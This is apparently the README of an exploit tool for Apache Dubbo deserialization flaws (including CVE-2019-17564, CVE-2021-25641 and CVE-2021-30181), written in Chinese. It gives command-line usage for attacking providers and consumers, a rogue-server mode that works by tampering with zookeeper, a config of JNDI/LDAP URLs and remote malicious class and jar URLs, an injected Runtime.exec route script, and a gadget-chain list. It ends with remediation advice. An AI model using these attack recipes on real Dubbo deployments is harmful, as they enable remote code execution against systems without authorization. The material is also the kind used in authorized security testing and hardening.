Awesome

工具仅用于安全研究以及内部自查，禁止使用工具发起非法攻击，造成的后果使用者负责

Dubbo反序列化测试工具

零、编译&构建

mvn assembly:single

一、使用帮助

usage: java -jar exp.jar [OPTION]
- -h --help               帮助信息
- -l --list             输出所有gadget信息
- -g --gadget <arg>          gadget名称
- -a --args <arg>      gadget入参，多个参数使用多次该命令传入，例-a http://127.0.0.1:80/ -a Calc
- -p --protocol <arg>   [dubbo|http] 通讯协议名称，默认缺省dubbo
- -s --serialization <arg>          [hessian|java] 序列化类型，默认缺省hessian
- -t --target <arg>          目标，例：127.0.0.1:20880
- -f --fastcheck <arg>   快速攻击检查（使用预置参数数据文件，遍历所有gadget进行攻击检查），参数为数据文件路径，参考文件check.data
- -e --evil    恶意服务模式，也就是通过返回恶意序列化数据给客户端，从而攻击连接进来的服务
- -evilHost <arg>    恶意服务ip
- -evilPort <arg>    恶意服务port
- -registry <arg>    [zookeeper]，暂时仅实现了攻击zookeeper，恶意服务模式下，攻击注册中心，控制客户端连接到本恶意服务，也就是通过返回恶意序列化数据给客户端，从而攻击连接进来的服务
- -scheme <arg>      [auth|digest]，zookeeper认证类型
- -username <arg>    [zookeeperUsername]，zookeeper认证账号
- -password <arg>    [zookeeperPassword]，zookeeper认证密码，digest：要对passWord进行MD5哈希，然后再进行bese64
- -registryURL <arg> zookeeper url，例：127.0.0.1:2181
- --wait <arg> 等待客户端回连超时时间，默认1000（毫秒）

二、example

1、快速检测

1.1、恶意服务-被动攻击（攻击客户端consumer） PS：使用被动攻击快速检测办法，有多少个gadget就会打开多少个恶意服务端口（因为客户端存在失败记录，不会再连接），每个端口返回一种gadget恶意序列化数据，等待客户端连接上来，会比较慢，就是视业务调用频率和心跳，所以，建议使用单个gadget精准打击。

例（使用恶意服务快速被动攻击dubbo客户端）：
```
-e
-evilHost
127.0.0.1
-evilPort
44444
--serialization
java
--wait
5000
-f
/Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data
```
例（使用恶意服务并主动篡改zookeeper，快速主动攻击dubbo客户端）：
```
-e
-evilHost
127.0.0.1
-evilPort
44444
-registry
zookeeper
-registryURL
127.0.0.1:2181
--serialization
java
--wait
5000
-f
/Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data
```

1.2、快速主动攻击（攻击服务端provider）例（快速攻击检测，若不指定序列化类型，则全部gadget都会尝试）：

java -jar dubbo-exp.jar
--target 127.0.0.1:20881 
--fastcheck /Users/threedr3am/dubbo-exp/check.data

check.dat预置参数文件内容：

### 快速漏洞攻击参数配置（将会根据相应匹配的参数选择对应的所有gadget攻击）
### 多个参数英文逗号分割

#JNDI注入url，JNDI注入需要考虑对方jdk版本，若是jdk8，
# 当小于jdk8u121，可以使用rmi服务进行JNDI注入攻击，
# jdk8u121～jdk8u191之间可以选择ldap服务替代，
# jdk8u191+需要使用tomcat-el依赖打法，或者使用gadget
JNDI=ldap://127.0.0.1:43658/Calc

#执行的shell命令
CMD=/System/Applications/Calculator.app/Contents/MacOS/Calculator
#或者 CMD=/bin/bash,-c,/System/Applications/Calculator.app/Contents/MacOS/Calculator

#Reference远程class代码url（在http服务器根存在一个Calc.class）
CODEBASE=http://127.0.0.1:80,Calc

#恶意jar包url（在http服务器根存在一个R.jar，jar包中存在一个恶意的class - Calc.class）
JAR=http://127.0.0.1:8080/R.jar,Calc

#DNS服务url
DNS=http://xxxx.ceye.io

2、特定gadget检测

2.1、主动攻击（攻击服务端provider）例（测试dubbo默认缺省情况下使用的dubbo协议+hessian2反序列化）：


--target
127.0.0.1:20881
--protocol
dubbo
--serialization
hessian
--gadget
rome
--args
ldap://127.0.0.1:43658/Calc

例（测试dubbo在使用http协议+java反序列化，dubbo < 2.7.5前使用http协议，后续改为了jsonrpc）CVE-2019-17564：

--target
127.0.0.1:8080/org.apache.dubbo.samples.http.api.DemoService
--protocol
http
--serialization
java
--gadget
CommonsCollections8
--args
/System/Applications/Calculator.app/Contents/MacOS/Calculator

2.2、恶意服务-被动攻击（攻击客户端consumer）例（使用恶意服务攻击dubbo客户端）：

-e
-evilHost
127.0.0.1
-evilPort
44444
--serialization
java
--gadget
CommonsCollections8
--args
/System/Applications/Calculator.app/Contents/MacOS/Calculator

2.3、恶意服务-主动攻击（攻击客户端consumer）例（使用恶意服务并主动篡改zookeeper，主动攻击dubbo客户端）：

-e
-evilHost
127.0.0.1
-evilPort
44444
-registry
zookeeper
-registryURL
127.0.0.1:2181
--serialization
java
--gadget
CommonsCollections8
-f
/Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data

3、route攻击（CVE-2021-30181）

3.1、注入js脚本主动攻击（攻击客户端consumer）例（通过在zookeeper注入脚本，实现攻击客户端consumer）：

-registry
zookeeper
-registryURL
127.0.0.1:2181
-route
script
-rule
"s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='open -a calculator';java.lang.Runtime.getRuntime().exec(s);"
-routeDeleteTtl
5

三、gadget列表
1. 名称：resin
2. 需要入参数量：2
3. 参数说明：arg[0]=恶意类所在web服务器ip，例：http://127.0.0.1:8080/，arg[1]=恶意类类名，此处需要恶意类无包名编译出来的
4. 序列化类型：hessian
5. 依赖：com.caucho:quercus:* dubbo版本<=2.7.5
1. 名称：rome
2. 需要入参数量：1
3. 参数说明：arg[0]=ldap引用外部class地址，例：ldap://127.0.0.1:43658/Calc（ldap协议的JNDI服务可打jdk8u191及以下版本，大于jdk8u191需要使用gadget字节码）
4. 序列化类型：hessian
5. 依赖：com.rometools:rome:* dubbo版本<=2.7.5
1. 名称：spring-aop
2. 需要入参数量：1
3. 参数说明：arg[0]=ldap引用外部class地址，例：ldap://127.0.0.1:43658/Calc（ldap协议的JNDI服务可打jdk8u191及以下版本，大于jdk8u191需要使用gadget字节码）
4. 序列化类型：hessian
5. 依赖：org.springframework:spring-aop 受Spring版本限制
1. 名称：xbean
2. 需要入参数量：2
3. 参数说明：arg[0]=恶意类所在web服务器ip，例：http://127.0.0.1:8080/，arg[1]=恶意类类名，此处需要恶意类无包名编译出来的
4. 序列化类型：hessian
5. 依赖：org.apache.xbean:xbean-naming:* dubbo版本<2.7.5
1. 名称：CommonsBeanutils
2. 需要入参数量：1
3. 参数说明：arg[0]=ldap引用外部class地址，例：ldap://127.0.0.1:43658/Calc（ldap协议的JNDI服务可打jdk8u191及以下版本，大于jdk8u191需要使用gadget字节码）
4. 序列化类型：java
5. 依赖：
1. 名称：CommonsBeanutils1
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-beanutils:commons-beanutils:1.9.2
1. 名称：CommonsCollections1
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections2
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：org.apache.commons:commons-collections4:4.0
1. 名称：CommonsCollections3
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections3ForLoadJar
2. 需要入参数量：2
3. 参数说明：arg[0]=jar包下载地址，例：http://127.0.0.1:8080/R.jar，arg[1]=jar包中恶意类名称
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections5
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections5ForLoadJar
2. 需要入参数量：2
3. 参数说明：arg[0]=jar包下载地址，例：http://127.0.0.1:8080/R.jar，arg[1]=jar包中恶意类名称
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections6
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections6ForLoadJar
2. 需要入参数量：2
3. 参数说明：arg[0]=jar包下载地址，例：http://127.0.0.1:8080/R.jar，arg[1]=jar包中恶意类名称
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections7
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections8
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：org.apache.commons:commons-collections4:4.0
1. 名称：CommonsCollections9
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections10
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.1
1. 名称：CommonsCollections11
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：commons-collections:commons-collections:3.2.1
1. 名称：URLDNS
2. 需要入参数量：1
3. 参数说明：arg[0]=dns server url
4. 序列化类型：java
5. 依赖：
1. 名称：C3P0
2. 需要入参数量：2
3. 参数说明：arg[0]=恶意类所在web服务器ip，例：http://127.0.0.1:8080/，arg[1]=恶意类类名，此处需要恶意类无包名编译出来的
4. 序列化类型：java
5. 依赖：com.mchange:c3p0:0.9.5.2 com.mchange:mchange-commons-java:0.2.11
1. 名称：rome
2. 需要入参数量：1
3. 参数说明：arg[0]=cmd
4. 序列化类型：java
5. 依赖：com.rometools:rome:*
四、漏洞修复建议
- 默认缺省的dubbo协议hessian反序列化漏洞：参考 learnjavabug 项目module->dubbo/dubbo-hessian2-safe-reinforcement，使用反序列化黑名单形式进行安全加固
- dubbo版本<2.7.5，http协议反序列化漏洞（CVE-2019-17564）：升级到最新版本2.7.5修复
- dubbo版本<=2.7.7、<=2.6.8、2.5.x，注册中心（zookeeper）未授权或者弱口令导致可读写，进行恶意服务DubboRouge被动攻击（CVE-2021-25641）：建议检查Zookeeper这些服务的脆弱性进行防护，并升级到2.7.8、2.6.9修复
- dubbo版本<=2.7.7、<=2.6.8、2.5.x，注册中心（zookeeper）未授权或者弱口令导致可读写，插入恶意脚本攻击客户端consumer（CVE-2021-30181）：建议检查Zookeeper这些服务的脆弱性进行防护，并升级到2.7.8、2.6.9修复